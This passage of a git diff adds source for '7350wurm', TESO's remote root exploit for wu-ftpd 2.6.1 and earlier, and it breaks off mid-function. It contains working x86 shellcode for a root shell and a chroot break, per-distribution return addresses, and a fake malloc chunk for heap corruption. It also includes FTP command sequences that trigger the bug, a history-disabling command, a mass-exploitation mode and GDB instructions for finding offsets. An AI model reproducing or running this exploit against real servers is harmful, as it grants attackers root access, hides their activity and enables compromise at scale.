+                        fprintf (stderr, " ");
+                if ((dp % 16) == 0) {
+                        fprintf (stderr, "| ");
+                        p = dp;
+                        for (dp -= 16; dp < p; dp++)
+                                fprintf (stderr, "%c", trans[data[dp]]);
+                        fflush (stderr);
+                        fprintf (stderr, "\n");
+                }
+                fflush (stderr);
+        }
+        if ((amount % 16) != 0) {
+                p = dp = 16 - (amount % 16);
+                for (dp = p; dp > 0; dp--) {
+                        fprintf (stderr, "   ");
+                        if (((dp % 8) == 0) && (p != 8))
+                                fprintf (stderr, " ");
+                        fflush (stderr);
+                }
+                fprintf (stderr, " | ");
+                for (dp = (amount - (16 - p)); dp < amount; dp++)
+                        fprintf (stderr, "%c", trans[data[dp]]);
+                fflush (stderr);
+        }
+        fprintf (stderr, "\n");
+        return;
+}
+unsigned long int
+net_resolve (char *host)
+{
+        long            i;
+        struct hostent  *he;
+        i = inet_addr(host);
+        if (i == -1) {
+                he = gethostbyname(host);
+                if (he == NULL) {
+                        return (0);
+                } else {
+                        return (*(unsigned long *) he->h_addr);
+                }
+        }
+        return (i);
+}
+int
+net_connect (struct sockaddr_in *cs, char *server,
+        unsigned short int port, int sec)
+{
+        int                     n,
+                                len,
+                                error,
+                                flags;
+        int                     fd;
+        struct timeval          tv;
+        fd_set                  rset, wset;
+        struct sockaddr_in      csa;
+        if (cs == NULL)
+                cs = &csa;
+        /* first allocate a socket */
+        cs->sin_family = AF_INET;
+        cs->sin_port = htons (port);
+        fd = socket (cs->sin_family, SOCK_STREAM, 0);
+        if (fd == -1)
+                return (-1);
+        if (!(cs->sin_addr.s_addr = net_resolve (server))) {
+                close (fd);
+                return (-1);
+        }
+        flags = fcntl (fd, F_GETFL, 0);
+        if (flags == -1) {
+                close (fd);
+                return (-1);
+        }
+        n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
+        if (n == -1) {
+                close (fd);
+                return (-1);
+        }
+        error = 0;
+        n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
+        if (n < 0) {
+                if (errno != EINPROGRESS) {
+                        close (fd);
+                        return (-1);
+                }
+        }
+        if (n == 0)
+                goto done;
+        FD_ZERO(&rset);
+        FD_ZERO(&wset);
+        FD_SET(fd, &rset);
+        FD_SET(fd, &wset);
+        tv.tv_sec = sec;
+        tv.tv_usec = 0;
+        n = select(fd + 1, &rset, &wset, NULL, &tv);
+        if (n == 0) {
+                close(fd);
+                errno = ETIMEDOUT;
+                return (-1);
+        }
+        if (n == -1)
+                return (-1);
+        if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
+                if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
+                        len = sizeof(error);
+                        if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
+                                errno = ETIMEDOUT;
+                                return (-1);
+                        }
+                        if (error == 0) {
+                                goto done;
+                        } else {
+                                errno = error;
+                                return (-1);
+                        }
+                }
+        } else
+                return (-1);
+done:
+        n = fcntl(fd, F_SETFL, flags);
+        if (n == -1)
+                return (-1);
+        return (fd);
+}
+void
+net_write (int fd, const char *str, ...)
+{
+        char    tmp[1025];
+        va_list vl;
+        int     i;
+        va_start(vl, str);
+        memset(tmp, 0, sizeof(tmp));
+        i = vsnprintf(tmp, sizeof(tmp), str, vl);
+        va_end(vl);
+#ifdef DEBUG
+        printf ("[snd] %s%s", tmp, (tmp[strlen (tmp) - 1] == '\n') ? "" : "\n");
+#endif
+        send(fd, tmp, i, 0);
+        return;
+}
+int
+net_rlinet (int fd, char *buf, int bufsize, int sec)
+{
+        int                     n;
+        unsigned long int       rb = 0;
+        struct timeval          tv_start, tv_cur;
+        memset(buf, '\0', bufsize);
+        (void) gettimeofday(&tv_start, NULL);
+        do {
+                (void) gettimeofday(&tv_cur, NULL);
+                if (sec > 0) {
+                        if ((((tv_cur.tv_sec * 1000000) + (tv_cur.tv_usec)) -
+                                ((tv_start.tv_sec * 1000000) +
+                                (tv_start.tv_usec))) > (sec * 1000000))
+                        {
+                                return (-1);
+                        }
+                }
+                n = net_rtimeout(fd, NET_READTIMEOUT);
+                if (n <= 0) {
+                        return (-1);
+                }
+                n = read(fd, buf, 1);
+                if (n <= 0) {
+                        return (n);
+                }
+                rb++;
+                if (*buf == '\n')
+                        return (rb);
+                buf++;
+                if (rb >= bufsize)
+                        return (-2);    /* buffer full */
+        } while (1);
+}
+int
+net_rtimeout (int fd, int sec)
+{
+        fd_set          rset;
+        struct timeval  tv;
+        int             n, error, flags;
+        error = 0;
+        flags = fcntl(fd, F_GETFL, 0);
+        n = fcntl(fd, F_SETFL, flags | O_NONBLOCK);
+        if (n == -1)
+                return (-1);
+        FD_ZERO(&rset);
+        FD_SET(fd, &rset);
+        tv.tv_sec = sec;
+        tv.tv_usec = 0;
+        /* now we wait until more data is received then the tcp low level
+         * watermark, which should be setted to 1 in this case (1 is default)
+         */
+        n = select(fd + 1, &rset, NULL, NULL, &tv);
+        if (n == 0) {
+                n = fcntl(fd, F_SETFL, flags);
+                if (n == -1)
+                        return (-1);
+                errno = ETIMEDOUT;
+                return (-1);
+        }
+        if (n == -1) {
+                return (-1);
+        }
+        /* socket readable ? */
+        if (FD_ISSET(fd, &rset)) {
+                n = fcntl(fd, F_SETFL, flags);
+                if (n == -1)
+                        return (-1);
+                return (1);
+        } else {
+                n = fcntl(fd, F_SETFL, flags);
+                if (n == -1)
+                        return (-1);
+                errno = ETIMEDOUT;
+                return (-1);
+        }
+}
+static int
+sc_build_x86_lnx (unsigned char *target, size_t target_len,
+        unsigned char *shellcode, char **argv)
+{
+        int     i;
+        size_t  tl_orig = target_len;
+        if (strlen (shellcode) >= (target_len - 1))
+                return (-1);
+        memcpy (target, shellcode, strlen (shellcode));
+        target += strlen (shellcode);
+        target_len -= strlen (shellcode);
+        for (i = 0 ; argv[i] != NULL ; ++i)
+                ;
+        /* set argument count
+         */
+        target[0] = (unsigned char) i;
+        target++;
+        target_len--;
+        for ( ; i > 0 ; ) {
+                i -= 1;
+                if (strlen (argv[i]) >= target_len)
+                        return (-1);
+                printf ("[%3d/%3d] adding (%2d): %s\n",
+                        (tl_orig - target_len), tl_orig,
+                        strlen (argv[i]), argv[i]);
+                memcpy (target, argv[i], strlen (argv[i]));
+                target += strlen (argv[i]);
+                target_len -= strlen (argv[i]);
+                target[0] = (unsigned char) (i + 1);
+                target++;
+                target_len -= 1;
+        }
+        return (tl_orig - target_len);
+}
diff --git a/exploits/7350wurm/7350wurm-backup4.c b/exploits/7350wurm/7350wurm-backup4.c
new file mode 100644
index 0000000..528a58d
--- /dev/null
+++ b/exploits/7350wurm/7350wurm-backup4.c
@@ -0,0 +1,1217 @@
+/* 7350wurm - x86/linux wu-ftpd remote root exploit
+ *
+ * TESO CONFIDENTIAL - SOURCE MATERIALS
+ *
+ * This is unpublished proprietary source code of TESO Security.
+ *
+ * The contents of these coded instructions, statements and computer
+ * programs may not be disclosed to third parties, copied or duplicated in
+ * any form, in whole or in part, without the prior written permission of
+ * TESO Security. This includes especially the Bugtraq mailing list, the
+ * www.hack.co.za website and any public exploit archive.
+ *
+ * The distribution restrictions cover the entire file, including this
+ * header notice. (This means, you are not allowed to reproduce the header).
+ *
+ * (C) COPYRIGHT TESO Security, 2001
+ * All Rights Reserved
+ *
+ *****************************************************************************
+ * thanks to bnuts, tomas, dvorak, scrippie and max for hints, discussions and
+ * ideas (synnergy.net rocks, thank you buddies ! :).
+ */
+#define VERSION "0.1.2"
+#include <sys/types.h>
+#include <sys/time.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <arpa/telnet.h>
+#include <netdb.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdarg.h>
+#include <string.h>
+#include <time.h>
+#define INIT_CMD        "unset HISTFILE;id;uname -a;\n"
+/* shellcodes
+ */
+unsigned char   x86_lnx_loop[] =
+        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+        "\xeb\xfe";
+/* x86/linux write/read/exec code (41 bytes)
+ * does: 1. write (1, "\nsP\n", 4);
+ *       2. read (0, ncode, 0xff);
+ *       3. jmp ncode
+ */
+unsigned char   x86_wrx[] =
+        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+        "\x31\xdb\x43\xb8\x0b\x74\x51\x0b\x2d\x01\x01\x01"
+        "\x01\x50\x89\xe1\x6a\x04\x58\x89\xc2\xcd\x80\xeb"
+        "\x0e\x31\xdb\xf7\xe3\xfe\xca\x59\x6a\x03\x58\xcd"
+        "\x80\xeb\x05\xe8\xed\xff\xff\xff";
+unsigned char   x86_lnx_execve[] =
+        /* 49 byte x86 linux PIC setreuid(0,0) + chroot-break
+         * code by lorian / teso
+         */
+        "\x33\xdb\xf7\xe3\xb0\x46\x33\xc9\xcd\x80\x6a\x54"
+        "\x8b\xdc\xb0\x27\xb1\xed\xcd\x80\xb0\x3d\xcd\x80"
+        "\x52\xb1\x10\x68\xff\x2e\x2e\x2f\x44\xe2\xf8\x8b"
+        "\xdc\xb0\x3d\xcd\x80\x58\x6a\x54\x6a\x28\x58\xcd"
+        "\x80"
+        /* 33 byte x86/linux PIC argv -sc
+         */
+        "\xeb\x1c\x5f\x31\xc0\x50\x8a\x07\x47\x57\xae\x75"
+        "\xfd\x88\x67\xff\x48\x75\xf6\x5b\x53\x50\x5a\x89"
+//      "\xe1\xb0\x0b\xcd\x80\xe8\xdf\xff\xff\xff";
+/*FIXME*/"\xe1\xb0\x0b\xcc\xcd\x80\xe8\xdf\xff\xff\xff";
+//                      ^^ debug trap
+/* setreuid/chroot/execve
+ * lorian / teso */
+unsigned char   x86_lnx_shell[] =
+/* TODO: fix chroot break on 2.4.x series (somewhere between 2.4.6 and
+ *       2.4.13 they changed chroot behaviour. maybe to ptrace-inject
+ *       on parent process (inetd) and execute code there. (optional)
+ */
+        "\x33\xdb\xf7\xe3\xb0\x46\x33\xc9\xcd\x80\x6a\x54"
+        "\x8b\xdc\xb0\x27\xb1\xed\xcd\x80\xb0\x3d\xcd\x80"
+        "\x52\xb1\x10\x68\xff\x2e\x2e\x2f\x44\xe2\xf8\x8b"
+        "\xdc\xb0\x3d\xcd\x80\x58\x6a\x54\x6a\x28\x58\xcd"
+        "\x80"
+        "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f"
+        "\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80";
+/* HOWTO get the offsets:
+   retloc: objdump -R /usr/sbin/in.ftpd | grep free
+   set retaddr to 0x41414141 and run the exploit:
+   $ ./7 -t <yourtype> -D -v
+   Now when it asks for enter, just press it, but as it asks the second
+   time, attach GDB to the wuftpd process. Continue it, and press enter
+   in the exploit. Wuftpd will segfault.
+   Do:
+   (gdb) x/10wx $esp
+   It will show some parameters to free, the first parameter of the form
+   0x08...... is interesting:
+   (gdb) x/64wx 0x08......
+   Should show a block of 0x0ceb0ceb's in memory. Just choose such a place
+   as retloc and there you are.
+ */
+typedef struct {
+        char *                  desc;           /* distribution */
+        char *                  banner;         /* ftp banner part */
+        unsigned char *         shellcode;
+        unsigned int            shellcode_len;
+        unsigned long int       retloc;         /* return address location */
+        unsigned long int       retaddr;        /* return address */
+} tgt_type;
+tgt_type tmanual = {
+        "manual values",
+        "unknown banner",
+        x86_wrx, sizeof (x86_wrx) - 1,
+        0x41414141, 0x42424242
+};
+tgt_type targets[] = {
+        { "Debian sid [wu-ftpd_2.6.1-5_i386.deb]",
+                "Version wu-2.6.1(1) Sat Feb 24 01:43:53 GMT 2001",
+                x86_wrx, sizeof (x86_wrx) - 1,
+//              0x0806e7a0, 0x08094018 },
+                0x0806e7a0, 0x0806cfa0 + 320 + 1},
+        { "Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]",
+                "Version wu-2.6.0(1) Thu May 25 03:35:34 PDT 2000",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x080713e0, 0x08093c40 },
+        { "Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]",
+                "Version wu-2.6.1(1) Mon Jan 29 08:04:31 PST 2001",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x08072bd4, 0x080976e0},
+        { "RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.rpm]",
+                "Version wu-2.4.2-academ[BETA-18](1) Mon Aug 3 19:17:20 EDT 1998",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x08061c48, 0x0806c948 },
+/* TODO: check, does not segfault !
+        { "RedHat 6.0 (Hedwig) [wu-ftpd-2.4.2vr17-3.rpm]",
+                "Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x08069f04, 0x41414141 },
+*/
+        { "RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]",
+                "Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806cb88, 0x08089848 },
+        { "RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]",
+                "Version wu-2.6.1-16(1)",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0807314c, 0x08098e40 },
+        /* slackware (from 8 on they use proftpd by default) */
+        { "Slackware 7",
+                "Version wu-2.6.0(1) Fri Oct 22 00:38:20 CDT 1999",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806d03c, 0x0808f648 },
+        { "Slackware 7.1",
+                "Version wu-2.6.0(1) Tue Jun 27 10:52:28 PDT 2000",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806ba2c, 0x08088e48 },
+        { NULL, NULL, 0, 0, 0, 0 },
+};
+/* exploitation related stuff.
+ * DO NOT CHANGE, except you know exactly what you are doing.
+ */
+#define CHUNK_POS       192
+#define MALLOC_ALIGN_MASK       0x07
+#define MALLOC_MINSIZE          0x10
+#define CHUNK_ROUND(s) \
+        (((((s) + 4 + MALLOC_ALIGN_MASK)) < \
+                (MALLOC_MINSIZE + MALLOC_ALIGN_MASK)) ? \
+        (MALLOC_MINSIZE) : ((((s) + 4 + MALLOC_ALIGN_MASK)) & ~MALLOC_ALIGN_MASK))
+/* minimum sized malloc(n) allocation that will jield in an overall
+ * chunk size of s. (s must be a valid %8=0 chunksize)
+ */
+#define CHUNK_ROUNDDOWN(s) \
+        ((s) <= 0x8) ? (1) : ((s) - 0x04 - 11)
+#define CHUNK_STRROUNDDOWN(s) \
+        (CHUNK_ROUNDDOWN ((s)) > 1 ? CHUNK_ROUNDDOWN ((s)) - 1 : 1)
+/* FTP related stuff
+ */
+char *  dest = "127.0.0.1";     /* can be changed with -d */
+char *  username = "ftp";       /* can be changed with -u */
+char *  password = "mozilla@";  /* can be changed with -p */
+char *  ftp_banner = NULL;
+int     verbose = 0;
+/* FTP prototypes
+ */
+void ftp_escape (unsigned char *buf, unsigned long int buflen);
+void ftp_recv_until (int sock, char *buff, int len, char *begin);
+int ftp_login (char *host, char *user, char *pass);
+/* main prototypes
+ */
+void usage (char *progname);
+tgt_type * tgt_frombanner (unsigned char *banner);
+void shell (int sock);
+void hexdump (char *desc, unsigned char *data, unsigned int amount);
+void xp_buildsize (int fd, unsigned char this_size_ls, unsigned long int csize);
+void xp_gapfill (int fd, int rnfr_num, int rnfr_size);
+int xp_build (tgt_type *tgt, unsigned char *buf, unsigned long int buf_len);
+void xp_buildchunk (tgt_type *tgt, unsigned char *cspace, unsigned int clen);
+/*** MASS mode stuff
+ */
+static int
+sc_build_x86_lnx (unsigned char *target, size_t target_len,
+        unsigned char *shellcode, char **argv);
+int             mass = 0;       /* enable with -m (kids, get hurt!) */
+unsigned int    mlen = 0;
+unsigned char   mcode[256];
+/* imported from network.c
+ */
+#define NET_CONNTIMEOUT 60
+#define NET_READTIMEOUT 20
+int     net_conntimeout = NET_CONNTIMEOUT;
+unsigned long int net_resolve (char *host);
+int net_connect (struct sockaddr_in *cs, char *server,
+        unsigned short int port, int sec);
+void net_write (int fd, const char *str, ...);
+int net_rtimeout (int fd, int sec);
+int net_rlinet (int fd, char *buf, int bufsize, int sec);
+/* exploitation related stuff, which is fixed on all wuftpd systems
+ */
+#define RNFR_SIZE       4
+#define RNFR_NUM        73
+int     automode = 0;   /* evil, do not use */
+int     debugmode = 0;
+void
+usage (char *progname)
+{
+        fprintf (stderr, "usage: %s [-h] [-v] [-a] [-D] [-m]\n"
+                "\t[-t <num>] [-u <user>] [-p <pass>] [-d host]\n"
+                "\t[-L <retloc>] [-A <retaddr>]\n\n", progname);
+        fprintf (stderr,
+                "-h\tthis help\n"
+                "-v\tbe verbose (default: off, twice for greater effect)\n"
+                "-a\tAUTO mode (target from banner)\n"
+                "-D\tDEBUG mode (waits for keypresses)\n"
+                "-m\tenable mass mode (use with care)\n"
+                "-t num\tchoose target (0 for list, try -v or -v -v)\n"
+                "-u user\tusername to login to FTP (default: \"ftp\")\n"
+                "-p pass\tpassword to use (default: \"mozilla@\")\n"
+                "-d dest\tIP address or fqhn to connect to "
+                        "(default: 127.0.0.1)\n"
+                "-L loc\toverride target-supplied retloc (format: 0xdeadbeef)\n"
+                "-A addr\toverride target-supplied retaddr (format: 0xcafebabe)\n");
+        fprintf (stderr, "\n");
+        exit (EXIT_FAILURE);
+}
+int
+main (int argc, char *argv[])
+{
+        char                    c;
+        char *                  progname;       /* = argv[0] */
+        int                     fd;
+        tgt_type *              tgt = NULL;
+        int                     tgt_num = -1;
+        unsigned long int       user_retloc = 0,
+                                user_retaddr = 0;
+        unsigned long int       malign = 0;     /* PWD alignment */
+        unsigned char           xpbuf[512 + 16];
+        fprintf (stderr, "7350wurm - x86/linux wuftpd <= 2.6.1 remote root\n"
+                "team teso (thx bnuts, tomas, synnergy.net !).\n\n");
+        progname = argv[0];
+        if (argc < 2)
+                usage (progname);
+        while ((c = getopt (argc, argv, "M:hvaDmt:u:p:d:L:A:")) != EOF) {
+                switch (c) {
+                case 'M':
+                        if (sscanf (optarg, "%lu", &malign) != 1)
+                                usage (progname);
+                        break;
+                case 'h':
+                        usage (progname);
+                        break;
+                case 'a':
+                        automode = 1;
+                        break;
+                case 'D':
+                        debugmode = 1;
+                        break;
+                case 'v':
+                        verbose += 1;
+                        break;
+                case 'm':
+                        mass = 1;
+                        break;
+                case 't':
+                        if (sscanf (optarg, "%u", &tgt_num) != 1)
+                                usage (progname);
+                        break;
+                case 'u':
+                        username = optarg;
+                        printf ("username = %s\n", optarg);
+                        break;
+                case 'p':
+                        password = optarg;
+                        break;
+                case 'd':
+                        dest = optarg;
+                        break;
+                case 'L':
+                        if (sscanf (optarg, "0x%lx", &user_retloc) != 1)
+                                usage (progname);
+                        break;
+                case 'A':
+                        if (sscanf (optarg, "0x%lx", &user_retaddr) != 1)
+                                usage (progname);
+                        break;
+                default:
+                        usage (progname);
+                        break;
+                }
+        }
+        /* if both required offsets are given manually, then we dont have
+         * to require a target selection. otherwise check whether the target
+         * is within the list. if its not, then print a list of available
+         * targets
+         */
+        if (user_retloc != 0 && user_retaddr != 0) {
+                tgt = &tmanual;
+        } else if (automode == 0 && (tgt_num == 0 ||
+                tgt_num >= (sizeof (targets) / sizeof (tgt_type))))
+        {
+                if (tgt_num != 0)
+                        printf ("WARNING: target out of list. giving list\n\n");
+                tgt_num = 0;
+                printf ("num . description\n");
+                printf ("----+-------------------------------------------------------\n");
+                for ( ; targets[tgt_num].desc != NULL ; ++tgt_num) {
+                        printf ("%3d | %s\n", tgt_num + 1,
+                                targets[tgt_num].desc);
+                        if (verbose)
+                                printf ("    :    %s\n", targets[tgt_num].banner);
+                        if (verbose >= 2)
+                                printf ("    :    retloc: 0x%08lx   "
+                                        "retaddr: 0x%08lx\n",
+                                        targets[tgt_num].retloc,
+                                        targets[tgt_num].retaddr);
+                }
+                printf ("    '\n");
+                exit (EXIT_SUCCESS);
+        }
+        if (tgt == NULL && automode == 0)
+                tgt = &targets[tgt_num - 1];
+        if (mass == 1) {
+                if ((argc - optind) == 0)
+                        usage (progname);
+                mlen = sc_build_x86_lnx (mcode, sizeof (mcode),
+                        x86_lnx_execve, &argv[optind]);
+                if (mlen >= 0xff) {
+                        fprintf (stderr, "created argv-code too long "
+                                "(%d bytes)\n", mlen);
+                        exit (EXIT_FAILURE);
+                }
+                fprintf (stderr, "# created %d byte execve shellcode\n", mlen);
+        }
+        printf ("# trying to log into %s with (%s/%s) ...", dest,
+                username, password);
+        fflush (stdout);
+        fd = ftp_login (dest, username, password);
+        if (fd <= 0) {
+                fprintf (stderr, "\nfailed to connect (user/pass correct?)\n");
+                exit (EXIT_FAILURE);
+        }
+        printf (" connected.\n");
+        if (debugmode) {
+                printf ("DEBUG: press enter\n");
+                getchar ();
+        }
+        printf ("# banner: %s", (ftp_banner == NULL) ? "???" :
+                ftp_banner);
+        if (tgt == NULL && automode) {
+                tgt = tgt_frombanner (ftp_banner);
+                if (tgt == NULL) {
+                        printf ("# failed to jield target from banner, aborting\n");
+                        exit (EXIT_FAILURE);
+                }
+                printf ("# successfully selected target from banner\n");
+        }
+        if (user_retaddr != 0) {
+                fprintf (stderr, "# overriding target retaddr with: 0x%08lx\n",
+                        user_retaddr);
+                tgt->retaddr = user_retaddr;
+        }
+        if (user_retloc != 0) {
+                fprintf (stderr, "# overriding target retloc with: 0x%08lx\n",
+                        user_retloc);
+                tgt->retloc = user_retloc;
+        }
+        printf ("\n### TARGET: %s\n\n", tgt->desc);
+        /* real stuff starts from here
+         */
+        printf ("# 1. filling memory gaps\n");
+        xp_gapfill (fd, RNFR_NUM, RNFR_SIZE);
+        printf ("# 2. sending bigbuf + fakechunk\n");
+        xp_build (tgt, xpbuf, 500 - strlen ("LIST "));
+        if (verbose)
+                hexdump ("xpbuf", xpbuf, strlen (xpbuf));
+        ftp_escape (xpbuf, sizeof (xpbuf));
+        net_write (fd, "CWD %s\n", xpbuf);
+        ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "550 ");
+        /* synnergy.net uberleet method (thank you very much guys !)
+         */
+        net_write (fd, "CWD ~/{.,.,.,.}\n");
+        ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "250 ");
+        /* now, we flush the last-used-chunk marker in glibc malloc code. else
+         * we might land in a previously used bigger chunk, but we need a
+         * sequential order. "CWD ." will allocate a two byte chunk, which will
+         * be reused on any later small malloc.
+         */
+        net_write (fd, "CWD .\n");
+        ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "250 ");
+        /* cause chunk w/ 0x20 size */
+        xp_gapfill (fd, 1, CHUNK_ROUNDDOWN (0x20));
+        {
+                unsigned long int       dir_chunk_size,
+                                        bridge_dist,
+                                        padchunk_size,
+                                        fakechunk_size;
+                unsigned char *         dl;     /* dirlength */
+                net_write (fd, "PWD\n");
+                ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "257 ");
+                dl = strchr (xpbuf, '"');
+                if (dl == NULL || strchr (dl + 1, '"') == NULL) {
+                        fprintf (stderr, "faulty PWD reply: %s\n", xpbuf);
+                        exit (EXIT_FAILURE);
+                }
+                dir_chunk_size = 0;
+                for (dl += 1 ; *dl != '"' ; ++dl)
+                        dir_chunk_size += 1;
+                dir_chunk_size += 3;    /* ~/ + NUL byte */
+                dir_chunk_size = CHUNK_ROUND (dir_chunk_size);
+                printf ("dir_chunk_size = 0x%08lx\n", dir_chunk_size);
+                /* 0x10 (CWD ~/{.,.,.,.}) + 4 * dirchunk */
+                bridge_dist = 0x10 + 4 * dir_chunk_size;
+                printf ("bridge_dist = 0x%08lx\n", bridge_dist);
+                /* 0x18 (RNFR 16), dcs (RNFR dir), 0x10 (CWD ~{) */
+                padchunk_size = bridge_dist - 0x18 - dir_chunk_size - 0x10;
+//              padchunk_size = bridge_dist - 0x10 - dir_chunk_size - 0x10;
+                printf ("padchunk_size = 0x%08lx\n", padchunk_size);
+                /* +4 = this_size field itself */
+                fakechunk_size = CHUNK_POS - 0x1c + 4;
+                fakechunk_size |= 0x1;  /* PREV_INUSE */
+                printf ("fakechunk_size = 0x%08lx\n", fakechunk_size);
+                xp_buildsize (fd, fakechunk_size, dir_chunk_size);
+                /* pad down to the minimum possible size in 8 byte alignment
+                 */
+                printf ("\npadchunk_size = 0x%08lx\n==> %d\n",
+                        padchunk_size, padchunk_size - 8 - 1);
+                xp_gapfill (fd, 1, padchunk_size - 8 - 1);
+//              xp_gapfill (fd, 1, CHUNK_ROUNDDOWN (padchunk_size + 0x8));
+        }
+        if (debugmode) {
+                printf ("press enter\n");
+                getchar ();
+        }
+        printf ("# 3. triggering free(globlist[1])\n");
+        net_write (fd, "CWD ~{\n");
+        ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "sP");
+        if (strncmp (xpbuf, "sP", 2) != 0) {
+                fprintf (stderr, "exploitation FAILED !\noutput:\n%s\n",
+                        xpbuf);
+                exit (EXIT_FAILURE);
+        }
+        printf ("#\n# exploitation succeeded. sending real shellcode\n");
+        if (mass == 1) {
+                printf ("# mass mode, sending constructed argv code\n");
+                net_write (fd, "%s\n", mcode);
+                printf ("# send. sleeping 10 seconds\n");
+                sleep (10);
+                printf ("# success.\n");
+                exit (EXIT_SUCCESS);
+        }
+        printf ("# sending setreuid/chroot/execve shellcode\n");
+        net_write (fd, "%s", x86_lnx_shell);
+        printf ("# spawning shell\n");
+        printf ("##################################################"
+                        "##########################\n");
+        write (fd, INIT_CMD, strlen (INIT_CMD));
+        shell (fd);
+        exit (EXIT_SUCCESS);
+}
+tgt_type *
+tgt_frombanner (unsigned char *banner)
+{
+        int     tw;     /* target list walker */
+        for (tw = 0 ; targets[tw].desc != NULL ; ++tw) {
+                if (strstr (banner, targets[tw].banner) != NULL)
+                        return (&targets[tw]);
+        }
+        return (NULL);
+}
+/* xp_buildsize
+ *
+ * set chunksize to this_size_ls. do this in a csize bytes long chunk.
+ * normally csize = 0x10. csize is always a padded chunksize.
+ */
+void
+xp_buildsize (int fd, unsigned char this_size_ls, unsigned long int csize)
+{
+        int             n,
+                        cw,     /* chunk walker */
+                        bw;     /* back walker */
+        unsigned char   tmpbuf[512];
+        unsigned char * leet = "7350";
+        for (n = 2 ; n > 0 ; --n) {
+                memset (tmpbuf, '\0', sizeof (tmpbuf));
+                for (cw = 0 ; cw < (csize - 0x08) ; ++cw)
+                        tmpbuf[cw] = leet[cw % 4];
+                tmpbuf[cw - 4 + n] = '\0';
+                printf (": CWD %s\n", tmpbuf);
+                net_write (fd, "CWD %s\n", tmpbuf);
+                ftp_recv_until (fd, tmpbuf, sizeof (tmpbuf), "550 ");
+        }
+        memset (tmpbuf, '\0', sizeof (tmpbuf));
+        for (cw = 0 ; cw < (csize - 0x08 - 0x04) ; ++cw)
+                tmpbuf[cw] = leet[cw % 4];
+        printf ("| CWD %s\n", tmpbuf);
+        net_write (fd, "CWD %s%c\n", tmpbuf, this_size_ls);
+        ftp_recv_until (fd, tmpbuf, sizeof (tmpbuf), "550 ");
+        /* send a minimum-sized malloc request that will allocate a chunk
+         * with 'csize' overall bytes
+         */
+        xp_gapfill (fd, 1, CHUNK_STRROUNDDOWN (csize));
+        return;
+}
+/* xp_gapfill
+ *
+ * fill all small memory gaps in wuftpd malloc space. do this by sending
+ * rnfr requests which cause a memleak in wuftpd.
+ *
+ * return in any case
+ */
+void
+xp_gapfill (int fd, int rnfr_num, int rnfr_size)
+{
+        int             n;
+        unsigned char * rb;             /* rnfr buffer */
+        unsigned char * rbw;            /* rnfr buffer walker */
+        unsigned char   rcv_buf[512];   /* temporary receive buffer */
+        rbw = rb = calloc (1, rnfr_size + 6);
+        strcpy (rbw, "RNFR ");
+        rbw += strlen (rbw);
+        /* append a string of "././././". since wuftpd only checks whether
+         * the pathname is lstat'able, it will go through without any problems
+         */
+        for (n = 0 ; n < rnfr_size ; ++n)
+                strcat (rbw, ((n % 2) == 0) ? "." : "/");
+        strcat (rbw, "\n");
+        for (n = 0 ; n < rnfr_num; ++n) {
+                net_write (fd, "%s", rb);
+                ftp_recv_until (fd, rcv_buf, sizeof (rcv_buf), "350 ");
+        }
+        free (rb);
+        return;
+}
+#define ADDR_STORE(ptr,addr){\
+        ((unsigned char *) (ptr))[0] = (addr) & 0xff;\
+        ((unsigned char *) (ptr))[1] = ((addr) >> 8) & 0xff;\
+        ((unsigned char *) (ptr))[2] = ((addr) >> 16) & 0xff;\
+        ((unsigned char *) (ptr))[3] = ((addr) >> 24) & 0xff;\
+}
+int
+xp_build (tgt_type *tgt, unsigned char *buf, unsigned long int buf_len)
+{
+        unsigned char * wl;
+        memset (buf, '\0', buf_len);
+        memset (buf, '0', CHUNK_POS);
+        xp_buildchunk (tgt, buf + CHUNK_POS, buf_len - CHUNK_POS - 1);
+        for (wl = buf + strlen (buf) ; wl < &buf[buf_len - 1] ; wl += 2) {
+                wl[0] = '\xeb';
+                wl[1] = '\x0c';
+        }
+        memcpy (&buf[buf_len - 1] - tgt->shellcode_len, tgt->shellcode,
+                tgt->shellcode_len);
+        return (strlen (buf));
+}
+/* xp_buildchunk
+ *
+ * build the fake malloc chunk that will overwrite retloc with retaddr
+ */
+void
+xp_buildchunk (tgt_type *tgt, unsigned char *cspace, unsigned int clen)
+{
+        fprintf (stderr, "\tbuilding chunk: ([0x%08lx] = 0x%08lx) in %d bytes\n",
+                tgt->retloc, tgt->retaddr, clen);
+        /* easy, straight forward technique
+         */
+        ADDR_STORE (&cspace[0], 0xfffffff0);            /* prev_size */
+        ADDR_STORE (&cspace[4], 0xfffffffc);            /* this_size */
+        ADDR_STORE (&cspace[8], tgt->retloc - 12);      /* fd */
